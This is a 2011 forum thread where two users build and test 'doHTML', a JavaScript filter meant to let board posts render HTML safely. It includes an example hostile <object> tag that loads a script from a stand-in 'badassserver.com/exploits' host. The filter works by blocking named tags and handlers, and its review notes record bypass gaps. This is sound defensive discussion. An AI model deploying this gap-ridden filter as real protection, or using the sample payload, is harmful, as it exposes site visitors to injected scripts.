Post by Bones on Mar 6, 2011 18:22:49 GMT -8
I've decided to abandon this code, since it is becoming painfully obvious that by trying to weed out the potentially harmful parts of HTML and also account for mistakes in the input HTML, the code grows larger and larger and, even more disappointingly, slower. Currently it is taking a full 9 seconds to render the dohtml tags on the first page of this thread, and even with optimizations I can only shave 2 seconds off.
I've totally rewritten the code to offload all those decisions about markup mistakes onto the browser and instead concentrate on security.
<script type="text/javascript">
// doHTML: renders [dohtml]...[/dohtml] blocks found inside [quote] tables as live
// HTML, after neutralising <script>/<object>/<applet> tags, inline on* event
// handler attributes and src/href values whose scheme is not http(s)/ftp.
// Runs once when the script executes and again on window load for blocks
// written as [dohtml defer].
// Globals read: pb_action (page-level variable, not defined here), document,
// window. Globals written: isError (implicit, see note below).
(function doHTML(){
//doHTML (v0.3.00)
// Only run on page actions that show post content; pb_action is assumed to hold
// the board's current action name — confirm against the host page.
if(!/(display|(pm|calendar|pre)view|search|recent)/.test(pb_action))return;
// Cells queued for the load-time pass are kept on the function object itself so
// they survive between the two runs.
if("undefined" == typeof(arguments.callee.defer))arguments.callee.defer=[];
var parser = {
  // Detached <div> that lets the browser parse and re-serialise the markup.
  // parse() is attached as a method; it returns itself with .innerHTML set to
  // the serialised (sanitised) result, which is what the caller reads.
  sandbox:(function sandBox(){
    var div = document.createElement('div')
    // htm: raw, untrusted post HTML (may carry %xx and &entity; encoding).
    // keepEvents: when falsy, on* attributes are renamed to no*. The only
    //   caller below passes a single argument, so handlers are always renamed.
    // Returns: this function object; parse.innerHTML / parser.html hold the
    //   serialised markup, parse.nodes / parser.nodes the parsed nodes.
    div.parse=function parse(htm,keepEvents){
      var y
      // Decode first so the checks below see literal characters, then
      // entity-escape the '<' of opening/closing script, object and applet
      // tags. ("&"+"lt;" is split so this source survives being posted
      // through the board's own entity handling.)
      htm = deEntify(htm).replace(/<(\/)?(script|object|applet)/gi,"&"+"lt;$1$2"); //still allows the rigidly defined <embed> tag which doesn't vary from app to app like object
      // Empty the value of any src/href whose scheme is not http(s)/ftp;
      // fragment links (#...) are left alone.
      // NOTE(review): only src and href are inspected; other URI-bearing
      // attributes (e.g. action, background, or url() inside style) pass
      // through untouched.
      htm = htm.replace(/(src|href)\s*=\s*['"]?([^\s]+)/gi,function checkURI(m,p,p1,index,txt){
        //p=p.toLowerCase();
        if(/^#/.test(p1))return m;
        //if(p=="data" && !/^(object|applet)\s/i.test(text.substr(0,index).split('<').pop()))return m
        if(!/^(ht|f)tps?:/i.test(p1))return m.replace(p1,'');
        return m;
      })
      // Rename inline event handlers (onclick= becomes noclick=).
      // NOTE(review): the pattern requires '=' directly after the attribute
      // name, but HTML allows whitespace around '=', so `onclick = "..."`
      // is not rewritten. `/\bon(\w+)\s*=/g` would close that gap.
      if(!keepEvents)htm = htm.replace(/\bon(\w+)=/g,"no$1=");
      // Let the browser parse the markup; the re-serialised innerHTML is the
      // sanitised output handed back to the caller.
      this.innerHTML = htm
      parser.html = arguments.callee.innerHTML = this.innerHTML;
      // The parsed nodes are also moved into a fragment; nothing in this
      // file reads parser.nodes / parse.nodes afterwards.
      parser.nodes = document.createDocumentFragment()
      for(y=0;y<this.childNodes.length;y++)parser.nodes.appendChild(this.childNodes[y]);
      arguments.callee.nodes = parser.nodes;
      return arguments.callee
    }
    return div;
  })()
}
var defer = arguments.callee.defer;
// Decodes percent-encoding and HTML entities in txt.
// Uses the <textarea> trick (deEntify.convert) when the feature test below
// passed; otherwise decodes &lt; &gt; &amp; and numeric entities by hand.
// Returns: the decoded string — or, when decodeURIComponent throws, the
// error message (see note).
function deEntify(txt){
  var entity = {'lt':'<','gt':'>','amp':'&'},convert=arguments.callee.convert
  // Protect a '%' that is not followed by a hex digit from decodeURIComponent
  // by swapping it for \x07; restored after decoding.
  txt = txt.replace(/%(?![0-9a-fA-F])/g,'\x07');
  // NOTE(review): the lookahead checks a single hex digit, so a sequence such
  // as "%4G" or a truncated multi-byte sequence still throws, and the catch
  // returns the error message in place of the post's content.
  try{(function URIDec(){txt=decodeURIComponent(txt);})()}catch(e){return e.message||e}
  txt = txt.replace(/\x07/g,'%');
  if(convert){convert.innerHTML=txt; return convert.value;}
  // Fallback path: manual entity decoding.
  // NOTE(review): the replace is case-insensitive but the entity table is
  // lower-case, so an upper-case named entity (e.g. &LT;) misses the table
  // and reaches p1.length with p1 undefined, which throws.
  if(/&(#(x)?([a-f0-9]+)|lt|gt|amp);/i.test(txt))
    txt=txt.replace(/&(#(x)?([a-f0-9]+)|lt|gt|amp);/gi, function regDeEntifyHTML(m,p,p1,p2){
      if(entity[p])return entity[p];
      // p1 is the optional 'x' of &#x..; hex when present, decimal otherwise.
      return String.fromCharCode(parseInt(p2,(p1.length?16:10)))
    });
  return txt;
}
// Feature test for the <textarea> decoding trick; cleared to null unless the
// browser round-trips "&lt;test&gt; &#x5d;" to "<test> ]".
deEntify.convert = document.createElement('textarea');
try{deEntify.convert.innerHTML = "&"+"lt"+";test&"+"gt"+"; &"+"#x"+"5d;"; if(deEntify.convert.value!="<test> ]")deEntify.convert=null;}catch(e){deEntify.convert=null;}
// First pass scans every <td> that looks like a post body (width 80%, class
// windowbg, valign top) and contains a [dohtml] block; the load-time pass
// re-scans only the cells queued in defer.
for (var tds=defer.length?defer:document.getElementsByTagName('td'), i=0; i<tds.length; i++) {
  if (tds[i].width=="80%" && tds[i].className.match(/windowbg/) && tds[i].vAlign=="top" && tds[i].innerHTML.match(/\[dohtml(\s*defer\s*)?\]([\s\S]*?)\[\/dohtml\]/i) ) {
    for(var dotab = tds[i].getElementsByTagName('table'),fi=0;fi<dotab.length;fi++){
      if(/\b(quote)\b/.test(dotab[fi].className) && dotab[fi].innerHTML.match(/\[dohtml(\s*defer\s*)?\]([\s\S]*?)\[\/dohtml\]/i)){
        // RegExp.$1 is the optional " defer " group of the match just above.
        // A deferred block is queued for the load-time pass and tagged with a
        // "defer" class so it is not queued a second time.
        if(RegExp.$1.indexOf('defer')!=-1 && !/\b(defer)\b/.test(dotab[fi].className)){defer.push(tds[i]);dotab[fi].className+=" defer";continue;}
        var htm = dotab[fi].rows[0].cells[0].firstChild,html;
        //note: some browsers no longer allow full innerHTML access to textareas (webkit?)
        // Prefer the raw text of a nested <textarea> when there is one;
        // otherwise take the cell's innerHTML with <br> tags removed.
        if((html=htm.getElementsByTagName('textarea')) && html[0]){ htm=html[html.length-1].innerHTML; }else htm=htm.innerHTML.split(/<br\s*\/?>/i).join('');
        // Strip everything outside the [dohtml]...[/dohtml] markers, sanitise
        // in the sandbox and take the re-serialised markup.
        html = parser.sandbox.parse(htm.replace(/^[\s\S]*\[dohtml(\s*defer\s*)?\]/i,"").replace(/\[\/dohtml(\s*defer\s*)?\][\s\S]*$/i,"")).innerHTML;
        // NOTE(review): isError is never declared (implicit global) and is
        // always false here, so the "UNABLE TO CONVERT" branch is unreachable.
        isError=false;
        var dohtml=document.createElement('div');
        // This is where the user-supplied markup goes live: anything the
        // sandbox regexes do not catch is rendered into the page here.
        dohtml.innerHTML = (isError?htm.replace(/</g,'&l'+'t;')+ '\n\n\nUNABLE TO CONVERT DOHTML':(html));
        // Swap the element wrapping the previous table (presumably the quote
        // wrapper — confirm against the board markup) for the rendered div,
        // then step fi back two since the live table list has shrunk.
        dotab[fi-1].parentNode.parentNode.replaceChild(dohtml,dotab[fi-1].parentNode);fi-=2;
      }
    }
  }
}
// Re-run on load for any deferred blocks.
// NOTE(review): addEventListener is invoked detached from window; browsers
// that require a receiver throw "Illegal invocation" here. Calling
// window.addEventListener(...) directly keeps the receiver.
if(defer.length) (window.addEventListener||window.attachEvent)((window.addEventListener?'':'on')+'load',arguments.callee,false)
})()
</script>
Post by Wormopolis on Mar 7, 2011 0:03:15 GMT -8
new version loaded into this board footer
Post by Wormopolis on Mar 7, 2011 0:17:48 GMT -8
Interesting... it took tumbleweed's profile that you recreated in that post on the first page, and my footer codes applied to it like it was totally normal.
Post by Bones on Mar 7, 2011 12:28:20 GMT -8
0.95 seconds rendering time (not including google maps and PDF plugin initialization and content download time), now that's more like it!! interesting.. it took tumbleweeds profile that you recreated in that post in the first page and my footer codes applied to it like it was totally normal It also affects your PBS mini-profile posted in reply 12. How is IE7 on XP handling the new code, btw? You'll notice that the HTML errors the previous code was fixing up are no longer being handled; Firefox at least has an interesting interpretation of HTML: <table style="width: 183px; border:1px solid #000000; border-collapse:collapse;" cellpadding=4; border=1px solid #000000>
This is how it interprets that nonsense HTML: <table cellpadding="4;" border="1px" #000000="" solid="" style="border: 1px solid rgb(0, 0, 0); border-collapse: collapse;">
wth happened to width? Well, I'm not worried about it: if the user wants correct rendering then use correct HTML. As before, the code disallows all <script> tags and events (onclick, onmouseover, etc.). Object and Applet tags are also disallowed since they vary too greatly depending on the plugin as to what constitutes the active URI; <embed> tags are however allowed since they have a uniform URI designator (src). Objects and Applets will have to be converted to their embed equivalent to render.
Post by Wormopolis on Mar 7, 2011 15:44:24 GMT -8
what about iframes?
Post by Wormopolis on Mar 7, 2011 15:49:13 GMT -8
Firefox (3.6.15) is still working for me on XP. IE no longer leaves the entire post as the HTML with the message (could not interpret HTML) or whatever it was before; now it just leaves the entire dohtml in a code box, which my code box mod transforms into the standard scrolling div. The bottom bar reports "unknown runtime error", which is cryptic at the very least. I have the IE developer addon for IE, but I don't think it has a debugger.
Post by Bones on Mar 7, 2011 18:39:12 GMT -8
Reply #13 (the google map) is an iframe. Firefox (3.6.15) is working still for me on XP. IE no longer leaves the entire post as the HTML with the message (could not interpret HTML) or whatever it was before. now it just leaves the entire dohtml in a code box.. which my code box mod transforms into the standard scrolling div now. bottom bar reports "unknown runtime error".. which is cryptic at the very least. I have the IE developer addon for IE, but I don't think it has a debugger. Does it at least give a line number when you click on the error for more details? If you have M$ Office installed you can use the VBA debugger in there to debug javascript in IE. EDIT:
I forgot to make the regex in this line case-insensitive: }else htm=htm.innerHTML.split(/<br\s*\/?>/i).join(''); I've modified the code; try it on IE now.
Post by Wormopolis on Mar 8, 2011 23:42:29 GMT -8
All of them except reply #14 are working in Chrome.
Post by Wormopolis on Mar 8, 2011 23:45:27 GMT -8
Changing that regexp fixed it for IE as well.
Post by Bones on Mar 9, 2011 15:08:09 GMT -8
all of them except reply #14 are working in chrome Chrome comes with its own built-in PDF viewer, which I'm not too enthusiastic about since it has given me a few problems with PDFs. By default the internal PDF viewer is enabled and the external Adobe plugin is disabled; if you type chrome:plugins in the browser you can see which one you have running. I usually have Adobe's version running. Edit: after some research I'm satisfied that all major browsers will display rather than execute any attempt to load a script using the <object> tag, so I think I'll allow it in the code (still have to do some tests on <applet>).
Post by Wormopolis on Mar 9, 2011 17:05:52 GMT -8
What about, instead of displaying the script, it just posts a message that someone attempted to embed a script?
Post by Bones on Mar 9, 2011 17:55:23 GMT -8
what about instead of displaying the script it just posts a message that a script was attempted to be embedded? Nope, not venturing down that road again; the only focus is security. Content rendering will be left to the discretion of the browser. So if a user wants to be cute and try to load a script inside a post to do something to everybody that views the thread: <object data="http://badassserver.com/exploits/stealth.js" type="text/javascript" width="300" height="200"> Have a nice day! </object>
It won't work. My concern was the behavior of the browser in such a situation and in all cases they either show the script as plain text or degrade to the fallback ("Have a nice day!").
Post by Bones on Mar 12, 2011 12:56:37 GMT -8
Updated the code to use [quote] tags instead of [code] tags since it has come to my attention that doHTML implementations traditionally allow mixing UBBC with HTML.
Usage has changed from [code][dohtml]HTML GOES HERE[/dohtml][/code] to [quote][dohtml]HTML GOES HERE[/dohtml][/quote]
The change to the code is simple: if(/\b(quote)\b/.test(dotab[fi].className) && dotab[fi].innerHTML.match(/\[dohtml(\s*defer\s*)?\]([\s\S]*?)\[\/dohtml\]/i)){
As before, if there is a quote remodel installed, this code needs to run before that remodel occurs.
Post by Bones on Mar 14, 2011 10:31:54 GMT -8
[dohtml]<object width="425" height="355"><param value="internal" name="allownetworking"><param value="http://www.youtube.com/v/Sy7BaSUDObs&hl=en" name="movie"><param value="transparent" name="wmode"><embed width="425" height="355" wmode="transparent" type="application/x-shockwave-flash" src="http://www.youtube.com/v/Sy7BaSUDObs&hl=en" allownetworking="internal"></object>[/dohtml]
Gotta add a YouTube disable in the code to be in compliance with the TOS.
Post by Bones on Mar 14, 2011 10:50:08 GMT -8
[dohtml]<table class="showmeie" ><tbody><tr><td width="100%" valign="top"> <br/> <a class="nav" href="/index.cgi">ProBoards® Support</a> :: View Profile: Patrick Clinger<br/><table class="showmeie" width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#000000" class="bordercolor"><tbody><tr><td><table class="showmeie" width="100%" cellspacing="1" cellpadding="4" border="0"><tbody><tr><td bgcolor="#4080b0" colspan="2" class="titlebg"><font size="-1" color="#mcLarenmcLarenmcLaren" class="titletext"><img border="0" alt=" " src="http://s3.images.proboards.com/profile.gif"/> <b>View Profile: Patrick Clinger</b> (username: admin)</font></td></tr><tr><td width="20%" valign="top" bgcolor="#efefef" class="windowbg"><b><a class="group1" href="http:support.proboards.com/index.cgi?action=viewprofile&user=admin"><font color="#e3170d">Patrick Clinger</font></a></b><br/>ProBoards.com Staff<br/><img border="0" alt="*" src="http://support.proboards.com/stars/star_red.png"/><img border="0" alt="*" src="http://support.proboards.com/stars/star_red.png"/><img border="0" alt="*" src="http://support.proboards.com/stars/star_red.png"/><img border="0" alt="*" src="http://support.proboards.com/stars/star_red.png"/><img border="0" alt="*" src="http://support.proboards.com/stars/star_red.png"/><br/>member is offline<br/><br/><center><img width="62" height="74" border="0" alt="avatar" src="http://www.proboards.com/images/patrick8.jpg"/><br/><br/><br/><a target="_blank" href="http://www.patrickclinger.com/"><img border="0" alt="homepage" src="http://s3.images.proboards.com/buttons/www_sm.gif"/></a> <a href="/index.cgi?action=pmsend&to=admin"><img border="0" alt="send pm" src="http://s3.images.proboards.com/buttons/message_sm.gif"/></a> </center><br/>Joined: Dec 1999<br/>Gender: Male <img border="0" alt=" " src="http://s3.images.proboards.com/male.gif"/><br/>Posts: 8,723<br/>Location: Foothill Ranch, CA<br/></td><td width="80%" valign="top" bgcolor="#efefef" class="windowbg"><font 
size="2"><table class="showmeie" width="100%" cellspacing="1" cellpadding="4" border="0"><tbody><tr><td colspan="2"><font size="2"><b>Member's Bio - <a href="http:support.proboards.com/index.cgi?action=pmsend&to=admin">Send Personal Message</a></b><hr size="1"/></font></td></tr><tr><td width="25%"><font size="2">Name:</font></td><td><font size="2">Patrick Clinger</font></td></tr><tr><td width="25%"><font size="2">Email:</font></td><td><font size="2"><i>hidden</i></font></td></tr><tr><td width="25%"><font size="2">Web Site:</font></td><td><font size="2"><a target="_blank" href="http://www.patrickclinger.com/">Patrick Clinger . com</a></font></td></tr><tr><td width="25%"><font size="2">Birthday:</font></td><td><font size="2">12/28/1982</font></td></tr><tr><td width="25%"><font size="2">Age:</font></td><td><font size="2">25</font></td></tr><tr><td width="25%"><font size="2">Gender:</font></td><td><font size="2">Male</font></td></tr><tr><td width="25%"><font size="2">Location:</font></td><td><font size="2">Foothill Ranch, CA</font></td></tr><tr><td width="25%"><font size="2">Posts:</font></td><td><font size="2">8,723</font></td></tr><tr><td width="25%"><font size="2">Date Registered:</font></td><td><font size="2">Dec 25, 1999, 10:34pm</font></td></tr><tr><td width="25%"><font size="2">Account Status:</font></td><td><font size="2">Activated</font></td></tr><tr><td height="5" colspan="2"/></tr><tr><td colspan="2"><font size="2"><b>Recent Activity</b><hr size="1"/></font></td></tr><tr><td width="25%"><font size="2">Last Login Date:</font></td><td><font size="2"><b>Today</b> at 10:38pm</font></td></tr><tr><td width="25%" valign="top" rowspan="6"><font size="2">Recent Posts:</font></td><td valign="top"><font size="2"/><form onsubmit="disable(this)" method="post" action="/index.cgi?action=userrecentposts&user=admin"><font size="2">View <input type="text" maxlength="4" value="10" size="3" name="maxresults"> most recent posts. 
<input type="submit" value="Submit"></font></form></td></tr><tr><td valign="top"><font size="2"><a href="http://support.proboards.com/index.cgi?action=gotopost&board=support&thread=257549&post=2764418">Re: Select Forum Category</a> <b>Today</b> at 10:14pm</font></td></tr><tr><td valign="top"><font size="2"><a href="http://support.proboards.com/index.cgi?action=gotopost&board=support&thread=257532&post=2764390">Re: How about some different forum category choice</a> <b>Today</b> at 10:03pm</font></td></tr><tr><td valign="top"><font size="2"><a href="http://support.proboards.com/index.cgi?action=gotopost&board=support&thread=257549&post=2764330">Re: Select Forum Category</a> <b>Today</b> at 9:40pm</font></td></tr><tr><td valign="top"><font size="2"><a href="http://support.proboards.com/index.cgi?action=gotopost&board=support&thread=257558&post=2764277">Re: Select Forum Category Stays</a> <b>Today</b> at 9:18pm</font></td></tr><tr><td valign="top"><font size="2"><a href="http://support.proboards.com/index.cgi?action=gotopost&board=support&thread=257531&post=2764271">Re: Forum Classification Notice & Selection</a> <b>Today</b> at 9:14pm</font></td></tr><tr><td height="5" colspan="2"/></tr><tr><td colspan="2"><font size="2"><b>Signature</b><hr size="1"/></font></td></tr><tr><td colspan="2"><font size="1"><a target="_blank" href="http://blog.proboards.com/2008/06/recent-events-data-center-explosion-and.html"><img border="0" alt="image " src="http://blog.proboards.com/survivor.jpg"/></a><br/><b>I blame Shady. 
Do you?</b><br/><font size="1"><a target="_blank" href="http://my.barackobama.com/page/outreach/view/main/proboards">Barack Obama '08 - Donate!</a></font><br/></font></td></tr></tbody></table></font></td></tr></tbody></table></td></tr></tbody></table> <table class="showmeie" width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td align="right"><select onchange="if(this.optionsthis.selectedIndex.value) window.location=this.optionsthis.selectedIndex.value;" id="forumjump"><option value="">Forum Jump</option><option value="">--------------------</option><option value="/index.cgi">» Home</option><option value="">--------------------</option><option value="/index.cgi#general">» ProBoards</option><option value="">--------------------</option><option value="/index.cgi?board=status">- Network Status / Server Status</option><option value="/index.cgi?board=support">- Support Board</option><option value="/index.cgi?board=45bugs"> --- Bug Reporting</option><option value="/index.cgi?board=suggestions">- Suggestions Forum</option><option value="/index.cgi?board=suggestions1"> --- Accepted</option><option value="/index.cgi?board=suggestions2"> --- Rejected</option><option value="">--------------------</option><option value="/index.cgi#temptest">» Testing</option><option value="">--------------------</option><option value="/index.cgi?board=tests">- Testing Forum</option><option value="">--------------------</option><option value="/index.cgi#misc">» General</option><option value="">--------------------</option><option value="/index.cgi?board=promotion">- Discussion: Your ProBoard</option><option value="/index.cgi?board=opinions">- Get Opinions About Your Board</option><option value="/index.cgi?board=pbadvertise">- Your Board: Advertise</option><option value="/index.cgi?board=design">- Coding and Design Boards</option><option value="/index.cgi?board=programming"> --- General Programming Discussion</option><option value="/index.cgi?board=codedatabase"> --- Code 
Database</option><option value="/index.cgi?board=codesupport"> --- Coding Support</option><option value="/index.cgi?board=graphicsdiscussion"> --- Graphic Design Discussion</option><option value="/index.cgi?board=gdr"> --- Graphic Design Requests</option><option value="/index.cgi?board=v5coding"> --- ProBoards Version 5 Coding Changes</option><option value="/index.cgi?board=pbgt">- General Talk</option><option value="/index.cgi?board=gtwelcome"> --- Welcome</option><option value="/index.cgi?board=gtsub1"> --- Debates</option></select></td></tr></tbody></table> </td></tr></tbody></table>[/dohtml]
Need to fix the protocol check to account for relative URLs.